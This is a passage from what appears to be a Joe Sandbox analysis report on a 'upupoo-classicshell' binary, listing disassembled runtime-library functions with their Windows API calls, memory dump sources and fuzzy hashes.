                                                                                                              • Associated: 00000003.00000002.2357465932.0000000000C38000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                              • Associated: 00000003.00000002.2357496454.0000000000C3C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_3_2_c20000_upupoo-classicshell.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: CriticalSection$CurrentEnterLeaveThread
                                                                                                              • String ID:
                                                                                                              • API String ID: 2351996187-0
                                                                                                              • Opcode ID: 9746b22c9d1557f8b0b312f98e506c27e4de3f50d7d9d2818e63f795f1ea535b
                                                                                                              • Instruction ID: 6ace2b053c193a23db67100db1499cd91f267b352b0751cd940afb770c883dfb
                                                                                                              • Opcode Fuzzy Hash: 9746b22c9d1557f8b0b312f98e506c27e4de3f50d7d9d2818e63f795f1ea535b
                                                                                                              • Instruction Fuzzy Hash: CC0161733056149F8720CF59F884A5AF7A8FFA4724314853FE95783A14C735B941CB90
                                                                                                              Function 10008335 Relevance: 7.6, APIs: 5, Instructions: 53COMMONLIBRARYCODE
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • GetLastError.KERNEL32(00000001,A08361BA,-00000004,100099DF,10007D8E,A08361BA,?,100079B7,00000001,00000001), ref: 1000833A
                                                                                                              • _free.LIBCMT ref: 1000836F
                                                                                                              • _free.LIBCMT ref: 10008396
                                                                                                              • SetLastError.KERNEL32(00000000,00000001), ref: 100083A3
                                                                                                              • SetLastError.KERNEL32(00000000,00000001), ref: 100083AC
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000003.00000002.2357704492.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                              • Associated: 00000003.00000002.2357679875.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000003.00000002.2357728589.000000001000F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000003.00000002.2357751768.0000000010016000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000003.00000002.2357775198.0000000010018000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_3_2_10000000_upupoo-classicshell.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: ErrorLast$_free
                                                                                                              • String ID:
                                                                                                              • API String ID: 3170660625-0
                                                                                                              • Opcode ID: be5fe00e7ebe7fc6ce5050ff5d7bcedc5890c85bc21ae6bd646141cb03735dd5
                                                                                                              • Instruction ID: e26c0ef545dcd47e8bcfec2c5b2e182ed9186e3c9ce6794d5747df1ba295347b
                                                                                                              • Opcode Fuzzy Hash: be5fe00e7ebe7fc6ce5050ff5d7bcedc5890c85bc21ae6bd646141cb03735dd5
                                                                                                              • Instruction Fuzzy Hash: 7E01F47A905612ABF212D3344C85D2B26ADFFC4AF07220129FAC8D325AEF34DF016361
                                                                                                              Function 6E0B16BF Relevance: 7.6, APIs: 5, Instructions: 53COMMONLIBRARYCODE
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • GetLastError.KERNEL32(00000001,E644DAF2,-00000004,6E0B1256,6E0B0E6F,E644DAF2,?,6E0B0797,00000001,00000001), ref: 6E0B16C4
                                                                                                              • _free.LIBCMT ref: 6E0B16F9
                                                                                                              • _free.LIBCMT ref: 6E0B1720
                                                                                                              • SetLastError.KERNEL32(00000000,00000001), ref: 6E0B172D
                                                                                                              • SetLastError.KERNEL32(00000000,00000001), ref: 6E0B1736
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000003.00000002.2357826488.000000006E091000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6E090000, based on PE: true
                                                                                                              • Associated: 00000003.00000002.2357800390.000000006E090000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 00000003.00000002.2357861866.000000006E0BB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 00000003.00000002.2357887722.000000006E0C5000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 00000003.00000002.2357910342.000000006E0C6000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 00000003.00000002.2357935659.000000006E0C8000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 00000003.00000002.2357958732.000000006E0CC000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_3_2_6e090000_upupoo-classicshell.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: ErrorLast$_free
                                                                                                              • String ID:
                                                                                                              • API String ID: 3170660625-0
                                                                                                              • Opcode ID: c7eaa5cb4bb52231eb6c8ad6777cf6e1cddcdd7a01733f71013d065859d5d4f3
                                                                                                              • Instruction ID: b8d084188c018be3ac33f4be3c54a3e3360c5b58f6f44943eb1986453264f597
                                                                                                              • Opcode Fuzzy Hash: c7eaa5cb4bb52231eb6c8ad6777cf6e1cddcdd7a01733f71013d065859d5d4f3
                                                                                                              • Instruction Fuzzy Hash: E10181365A8A01AB860256F55CC8B9F26BDFFC77B97200525F428E7285FF77880A4178
                                                                                                              Function 00C214B0 Relevance: 7.5, APIs: 5, Instructions: 47threadCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • RaiseException.KERNEL32(C0000005,00000001,?,?), ref: 00C214C2
                                                                                                              • GetCurrentThreadId.KERNEL32 ref: 00C214DC
                                                                                                              • EnterCriticalSection.KERNEL32(?), ref: 00C214E9
                                                                                                              • LeaveCriticalSection.KERNEL32(?), ref: 00C214F9
                                                                                                              • RaiseException.KERNEL32(C0000005,00000001,00000000,00000000), ref: 00C21510
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000003.00000002.2357378295.0000000000C21000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00C20000, based on PE: true
                                                                                                              • Associated: 00000003.00000002.2357349414.0000000000C20000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                              • Associated: 00000003.00000002.2357440949.0000000000C33000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                              • Associated: 00000003.00000002.2357465932.0000000000C38000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                              • Associated: 00000003.00000002.2357496454.0000000000C3C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_3_2_c20000_upupoo-classicshell.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: CriticalExceptionRaiseSection$CurrentEnterLeaveThread
                                                                                                              • String ID:
                                                                                                              • API String ID: 2580436124-0
                                                                                                              • Opcode ID: db9da2f771d2d460b4d4951bb630ef91bf9e39de8adabc74af3d29ff7ae76af4
                                                                                                              • Instruction ID: 56e39a4913a02d487e6bfe34211cbbba4ebf8718f6717926b1760b5be4670344
                                                                                                              • Opcode Fuzzy Hash: db9da2f771d2d460b4d4951bb630ef91bf9e39de8adabc74af3d29ff7ae76af4
                                                                                                              • Instruction Fuzzy Hash: 4CF04F71610351ABD7209F65ED88B4FFBACEF64B02F05841DFA55E7150D7B4D9408B60
                                                                                                              Function 00C26B8A Relevance: 7.5, APIs: 5, Instructions: 47COMMONLIBRARYCODE
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • __getptd.LIBCMT ref: 00C26B96
                                                                                                                • Part of subcall function 00C27633: __getptd_noexit.LIBCMT ref: 00C27636
                                                                                                                • Part of subcall function 00C27633: __amsg_exit.LIBCMT ref: 00C27643
                                                                                                              • __amsg_exit.LIBCMT ref: 00C26BB6
                                                                                                              • __lock.LIBCMT ref: 00C26BC6
                                                                                                              • InterlockedDecrement.KERNEL32(?), ref: 00C26BE3
                                                                                                              • InterlockedIncrement.KERNEL32(02902D08), ref: 00C26C0E
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000003.00000002.2357378295.0000000000C21000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00C20000, based on PE: true
                                                                                                              • Associated: 00000003.00000002.2357349414.0000000000C20000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                              • Associated: 00000003.00000002.2357440949.0000000000C33000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                              • Associated: 00000003.00000002.2357465932.0000000000C38000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                              • Associated: 00000003.00000002.2357496454.0000000000C3C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_3_2_c20000_upupoo-classicshell.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: Interlocked__amsg_exit$DecrementIncrement__getptd__getptd_noexit__lock
                                                                                                              • String ID:
                                                                                                              • API String ID: 4271482742-0
                                                                                                              • Opcode ID: 0b16341be401b405bb165a432b1b0187a0004e19639e25f95fb9ecaf9027cbe8
                                                                                                              • Instruction ID: a9bd2268cc9502caaa61c01b9612eb6af2f7c3a965bab7e4d4bce1ae34827075
                                                                                                              • Opcode Fuzzy Hash: 0b16341be401b405bb165a432b1b0187a0004e19639e25f95fb9ecaf9027cbe8
                                                                                                              • Instruction Fuzzy Hash: 35014431D11B31EFDB11AB69B805B5E7760AF04721F054119F810A7AD1CB785E85EFE1
                                                                                                              Function 00C254BB Relevance: 7.5, APIs: 5, Instructions: 44memoryCOMMONLIBRARYCODE
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • __lock.LIBCMT ref: 00C254D9
                                                                                                                • Part of subcall function 00C28FB8: __mtinitlocknum.LIBCMT ref: 00C28FCE
                                                                                                                • Part of subcall function 00C28FB8: __amsg_exit.LIBCMT ref: 00C28FDA
                                                                                                                • Part of subcall function 00C28FB8: EnterCriticalSection.KERNEL32(?,?,?,00C2F0E5,00000004,00C36788,0000000C,00C2AFB2,00C25FFC,?,00000000,00000000,00000000,?,00C275E5,00000001), ref: 00C28FE2
                                                                                                              • ___sbh_find_block.LIBCMT ref: 00C254E4
                                                                                                              • ___sbh_free_block.LIBCMT ref: 00C254F3
                                                                                                              • HeapFree.KERNEL32(00000000,00C25FFC,00C362E8,0000000C,00C28F99,00000000,00C36620,0000000C,00C28FD3,00C25FFC,?,?,00C2F0E5,00000004,00C36788,0000000C), ref: 00C25523
                                                                                                              • GetLastError.KERNEL32(?,00C2F0E5,00000004,00C36788,0000000C,00C2AFB2,00C25FFC,?,00000000,00000000,00000000,?,00C275E5,00000001,00000214), ref: 00C25534
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000003.00000002.2357378295.0000000000C21000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00C20000, based on PE: true
                                                                                                              • Associated: 00000003.00000002.2357349414.0000000000C20000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                              • Associated: 00000003.00000002.2357440949.0000000000C33000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                              • Associated: 00000003.00000002.2357465932.0000000000C38000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                              • Associated: 00000003.00000002.2357496454.0000000000C3C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_3_2_c20000_upupoo-classicshell.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: CriticalEnterErrorFreeHeapLastSection___sbh_find_block___sbh_free_block__amsg_exit__lock__mtinitlocknum
                                                                                                              • String ID:
                                                                                                              • API String ID: 2714421763-0
                                                                                                              • Opcode ID: 070785f16e42c8bb1bbd4770ae6c7d6bfc83a4ac4e646ed7b601f29e9ac2a554
                                                                                                              • Instruction ID: a56108974e08c8f596e14998470bef66451b0149f6a0ce8248417b175d75b8bb
                                                                                                              • Opcode Fuzzy Hash: 070785f16e42c8bb1bbd4770ae6c7d6bfc83a4ac4e646ed7b601f29e9ac2a554
                                                                                                              • Instruction Fuzzy Hash: 8D01F971925735AADF307FB4BC0AB5F7B65AF00760F104128F450A68D1CF348B81BAA4
                                                                                                              Function 1000AC90 Relevance: 7.5, APIs: 5, Instructions: 40COMMONLIBRARYCODE
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • _free.LIBCMT ref: 1000ACA8
                                                                                                                • Part of subcall function 10007D68: HeapFree.KERNEL32(00000000,00000000,?,100079B7,00000001,00000001), ref: 10007D7E
                                                                                                                • Part of subcall function 10007D68: GetLastError.KERNEL32(A08361BA,?,100079B7,00000001,00000001), ref: 10007D90
                                                                                                              • _free.LIBCMT ref: 1000ACBA
                                                                                                              • _free.LIBCMT ref: 1000ACCC
                                                                                                              • _free.LIBCMT ref: 1000ACDE
                                                                                                              • _free.LIBCMT ref: 1000ACF0
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000003.00000002.2357704492.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                              • Associated: 00000003.00000002.2357679875.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000003.00000002.2357728589.000000001000F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000003.00000002.2357751768.0000000010016000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000003.00000002.2357775198.0000000010018000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_3_2_10000000_upupoo-classicshell.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: _free$ErrorFreeHeapLast
                                                                                                              • String ID:
                                                                                                              • API String ID: 776569668-0
                                                                                                              • Opcode ID: 35d290dd6ce9a4e568dd9869981766498484c1d4717f844deeffc955da894121
                                                                                                              • Instruction ID: 318a3a9f78d679aa99c89abd5948d98734d24fc59b6c73edf77fa33ced7e8332
                                                                                                              • Opcode Fuzzy Hash: 35d290dd6ce9a4e568dd9869981766498484c1d4717f844deeffc955da894121
                                                                                                              • Instruction Fuzzy Hash: B6F049718082249BF660CB58EEC2C2A33EDFF05BD43A28806F408D7648CA34FCC09A64
                                                                                                              Function 6E0B4709 Relevance: 7.5, APIs: 5, Instructions: 40COMMONLIBRARYCODE
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • _free.LIBCMT ref: 6E0B4721
                                                                                                                • Part of subcall function 6E0B0E49: HeapFree.KERNEL32(00000000,00000000,?,6E0B0797,00000001,00000001), ref: 6E0B0E5F
                                                                                                                • Part of subcall function 6E0B0E49: GetLastError.KERNEL32(E644DAF2,?,6E0B0797,00000001,00000001), ref: 6E0B0E71
                                                                                                              • _free.LIBCMT ref: 6E0B4733
                                                                                                              • _free.LIBCMT ref: 6E0B4745
                                                                                                              • _free.LIBCMT ref: 6E0B4757
                                                                                                              • _free.LIBCMT ref: 6E0B4769
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000003.00000002.2357826488.000000006E091000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6E090000, based on PE: true
                                                                                                              • Associated: 00000003.00000002.2357800390.000000006E090000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 00000003.00000002.2357861866.000000006E0BB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 00000003.00000002.2357887722.000000006E0C5000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 00000003.00000002.2357910342.000000006E0C6000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 00000003.00000002.2357935659.000000006E0C8000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 00000003.00000002.2357958732.000000006E0CC000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_3_2_6e090000_upupoo-classicshell.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: _free$ErrorFreeHeapLast
                                                                                                              • String ID:
                                                                                                              • API String ID: 776569668-0
                                                                                                              • Opcode ID: 78d7b4fcf8ec9f966539c14da26d1ac86f7fb3fc87b71d7a655ed2ed892b8f22
                                                                                                              • Instruction ID: 2151294d3fe7ad2ac8836310e1e301935c8d65fb922282ffa6c168288a0761b1
                                                                                                              • Opcode Fuzzy Hash: 78d7b4fcf8ec9f966539c14da26d1ac86f7fb3fc87b71d7a655ed2ed892b8f22
                                                                                                              • Instruction Fuzzy Hash: B0F062B1404A04AFCA40DAD5E5E4E5F33EDFB02B90B600C05F068E7A04EB32F981CAA4
                                                                                                              Function 10007C4E Relevance: 7.5, APIs: 5, Instructions: 30COMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • _free.LIBCMT ref: 10007C6C
                                                                                                                • Part of subcall function 10007D68: HeapFree.KERNEL32(00000000,00000000,?,100079B7,00000001,00000001), ref: 10007D7E
                                                                                                                • Part of subcall function 10007D68: GetLastError.KERNEL32(A08361BA,?,100079B7,00000001,00000001), ref: 10007D90
                                                                                                              • _free.LIBCMT ref: 10007C7E
                                                                                                              • _free.LIBCMT ref: 10007C91
                                                                                                              • _free.LIBCMT ref: 10007CA2
                                                                                                              • _free.LIBCMT ref: 10007CB3
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000003.00000002.2357704492.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                              • Associated: 00000003.00000002.2357679875.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000003.00000002.2357728589.000000001000F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000003.00000002.2357751768.0000000010016000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000003.00000002.2357775198.0000000010018000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_3_2_10000000_upupoo-classicshell.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: _free$ErrorFreeHeapLast
                                                                                                              • String ID:
                                                                                                              • API String ID: 776569668-0
                                                                                                              • Opcode ID: 5c4eb71f65a9c4c2e480ee765673f68e3255d5b53a9b05a421f3ce7727c5b878
                                                                                                              • Instruction ID: 15d336a34c38f9e85d3b72396b98038e7891700ac1bd6798f0f1a356c855b910
                                                                                                              • Opcode Fuzzy Hash: 5c4eb71f65a9c4c2e480ee765673f68e3255d5b53a9b05a421f3ce7727c5b878
                                                                                                              • Instruction Fuzzy Hash: 94F0DA74840630BBFB1A9F689C854193BB5FF196A1342824BF81C57379CB399941DF81
                                                                                                              Function 6E0B0A2E Relevance: 7.5, APIs: 5, Instructions: 30COMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • _free.LIBCMT ref: 6E0B0A4C
                                                                                                                • Part of subcall function 6E0B0E49: HeapFree.KERNEL32(00000000,00000000,?,6E0B0797,00000001,00000001), ref: 6E0B0E5F
                                                                                                                • Part of subcall function 6E0B0E49: GetLastError.KERNEL32(E644DAF2,?,6E0B0797,00000001,00000001), ref: 6E0B0E71
                                                                                                              • _free.LIBCMT ref: 6E0B0A5E
                                                                                                              • _free.LIBCMT ref: 6E0B0A71
                                                                                                              • _free.LIBCMT ref: 6E0B0A82
                                                                                                              • _free.LIBCMT ref: 6E0B0A93
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000003.00000002.2357826488.000000006E091000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6E090000, based on PE: true
                                                                                                              • Associated: 00000003.00000002.2357800390.000000006E090000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 00000003.00000002.2357861866.000000006E0BB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 00000003.00000002.2357887722.000000006E0C5000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 00000003.00000002.2357910342.000000006E0C6000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 00000003.00000002.2357935659.000000006E0C8000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 00000003.00000002.2357958732.000000006E0CC000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_3_2_6e090000_upupoo-classicshell.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: _free$ErrorFreeHeapLast
                                                                                                              • String ID:
                                                                                                              • API String ID: 776569668-0
                                                                                                              • Opcode ID: 3d06de8ee8f16da7aaed61dba7b1f72d64fc843e056c6309666c0ffa3124e432
                                                                                                              • Instruction ID: 70da2271bd070f207aa8043803e31c715250b94cc745a67275f91e5f9e621efd
                                                                                                              • Opcode Fuzzy Hash: 3d06de8ee8f16da7aaed61dba7b1f72d64fc843e056c6309666c0ffa3124e432
                                                                                                              • Instruction Fuzzy Hash: 93F030B4414920DF9F465F649A4858D3B75BB17F283851506F128E7358EF731441DBD4
                                                                                                              Function 6E097CA9 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 90COMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • GetModuleHandleW.KERNEL32(1B171CE2), ref: 6E097D01
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000003.00000002.2357826488.000000006E091000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6E090000, based on PE: true
                                                                                                              • Associated: 00000003.00000002.2357800390.000000006E090000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 00000003.00000002.2357861866.000000006E0BB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 00000003.00000002.2357887722.000000006E0C5000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 00000003.00000002.2357910342.000000006E0C6000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 00000003.00000002.2357935659.000000006E0C8000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 00000003.00000002.2357958732.000000006E0CC000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_3_2_6e090000_upupoo-classicshell.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: HandleModule
                                                                                                              • String ID: j3$j3$j3
                                                                                                              • API String ID: 4139908857-1354161450
                                                                                                              • Opcode ID: 461ca0e5c2f60c4f8b010c2dee7150ca232f38b83a4dd15445b3814ac145e3a5
                                                                                                              • Instruction ID: c77ce8a92bc1c8a1bfea6b2f39079d58a417db26877acaab5f078e5b308ed0e5
                                                                                                              • Opcode Fuzzy Hash: 461ca0e5c2f60c4f8b010c2dee7150ca232f38b83a4dd15445b3814ac145e3a5
                                                                                                              • Instruction Fuzzy Hash: A43190756187448FC720CF69C48076ABBF1FB9A340F14982EE8D8CB3A5D635E804AF46
                                                                                                              Function 00C28777 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 42COMMONLIBRARYCODE
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • ___BuildCatchObject.LIBCMT ref: 00C2878A
                                                                                                                • Part of subcall function 00C286E5: ___BuildCatchObjectHelper.LIBCMT ref: 00C2871B
                                                                                                              • _UnwindNestedFrames.LIBCMT ref: 00C287A1
                                                                                                              • ___FrameUnwindToState.LIBCMT ref: 00C287AF
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000003.00000002.2357378295.0000000000C21000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00C20000, based on PE: true
                                                                                                              • Associated: 00000003.00000002.2357349414.0000000000C20000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                              • Associated: 00000003.00000002.2357440949.0000000000C33000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                              • Associated: 00000003.00000002.2357465932.0000000000C38000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                              • Associated: 00000003.00000002.2357496454.0000000000C3C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_3_2_c20000_upupoo-classicshell.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: BuildCatchObjectUnwind$FrameFramesHelperNestedState
                                                                                                              • String ID: csm
                                                                                                              • API String ID: 2163707966-1018135373
                                                                                                              • Opcode ID: d395e47c4fee3de36c1416e76e79c5948a22428b50d66019b152ee7b52fcb40c
                                                                                                              • Instruction ID: fe546538c2859702e35fb667fe375a6322019b50ea52cd4f9c6ac75276a639d2
                                                                                                              • Opcode Fuzzy Hash: d395e47c4fee3de36c1416e76e79c5948a22428b50d66019b152ee7b52fcb40c
                                                                                                              • Instruction Fuzzy Hash: F1012431002229BBDF12AE51EC85EAA3F6AEF08354F208010BD1814960DB3299B5EBA0
                                                                                                              Function 00C2BB9B Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 38libraryloaderCOMMONLIBRARYCODE
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • GetModuleHandleA.KERNEL32(KERNEL32,00C261EF), ref: 00C2BBA0
                                                                                                              • GetProcAddress.KERNEL32(00000000,IsProcessorFeaturePresent), ref: 00C2BBB0
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000003.00000002.2357378295.0000000000C21000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00C20000, based on PE: true
                                                                                                              • Associated: 00000003.00000002.2357349414.0000000000C20000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                              • Associated: 00000003.00000002.2357440949.0000000000C33000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                              • Associated: 00000003.00000002.2357465932.0000000000C38000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                              • Associated: 00000003.00000002.2357496454.0000000000C3C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_3_2_c20000_upupoo-classicshell.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: AddressHandleModuleProc
                                                                                                              • String ID: IsProcessorFeaturePresent$KERNEL32
                                                                                                              • API String ID: 1646373207-3105848591
                                                                                                              • Opcode ID: b065b56095e6a9fdd61944f49a098c1690d6b43f7780b1c3b736c777d38142ee
                                                                                                              • Instruction ID: 90de14b43f817c12555d0f153ade2cf8b74a5bfb9be0ba144ee1b758d8cb521a
                                                                                                              • Opcode Fuzzy Hash: b065b56095e6a9fdd61944f49a098c1690d6b43f7780b1c3b736c777d38142ee
                                                                                                              • Instruction Fuzzy Hash: 87F03A30A20A59D3DF046BA6BD0EBAE7BB9FB80706F820590D592E00C8DF319574C352
                                                                                                              Function 00C213F0 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 15timeCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • ?DllLogToFile@@YAXPB_W0ZZ.CLASSICSTARTMENUDLL(Software\UpupooClassic\ClassicStartMenu\Settings|LogStartup|%LOCALAPPDATA%\ClassicShell\StartupLog.txt,StartMenu: Taskbar Created), ref: 00C213FD
                                                                                                              • SetTimer.USER32(?,00000001,00000064,00000000), ref: 00C21410
                                                                                                              Strings
                                                                                                              • Software\UpupooClassic\ClassicStartMenu\Settings|LogStartup|%LOCALAPPDATA%\ClassicShell\StartupLog.txt, xrefs: 00C213F6
                                                                                                              • StartMenu: Taskbar Created, xrefs: 00C213F1
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000003.00000002.2357378295.0000000000C21000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00C20000, based on PE: true
                                                                                                              • Associated: 00000003.00000002.2357349414.0000000000C20000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                              • Associated: 00000003.00000002.2357440949.0000000000C33000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                              • Associated: 00000003.00000002.2357465932.0000000000C38000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                              • Associated: 00000003.00000002.2357496454.0000000000C3C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_3_2_c20000_upupoo-classicshell.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: File@@Timer
                                                                                                              • String ID: Software\UpupooClassic\ClassicStartMenu\Settings|LogStartup|%LOCALAPPDATA%\ClassicShell\StartupLog.txt$StartMenu: Taskbar Created
                                                                                                              • API String ID: 2092230787-2359932185
                                                                                                              • Opcode ID: f3b44d2a53f1d98bab78d8327e013d9ecd81be0b6ac65db320e69c549c6abfbd
                                                                                                              • Instruction ID: e662e69f7842df74e7d350dfc0b9c088bc8566d1b91a8e7331b5d36431eaf419
                                                                                                              • Opcode Fuzzy Hash: f3b44d2a53f1d98bab78d8327e013d9ecd81be0b6ac65db320e69c549c6abfbd
                                                                                                              • Instruction Fuzzy Hash: 8AD012717A13907FE2305724AC8BF8B3A649B05B27F010C21B905FA2D1C5E2D6548664
                                                                                                              Function 6E0B1DAC Relevance: 6.3, APIs: 4, Instructions: 305COMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000003.00000002.2357826488.000000006E091000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6E090000, based on PE: true
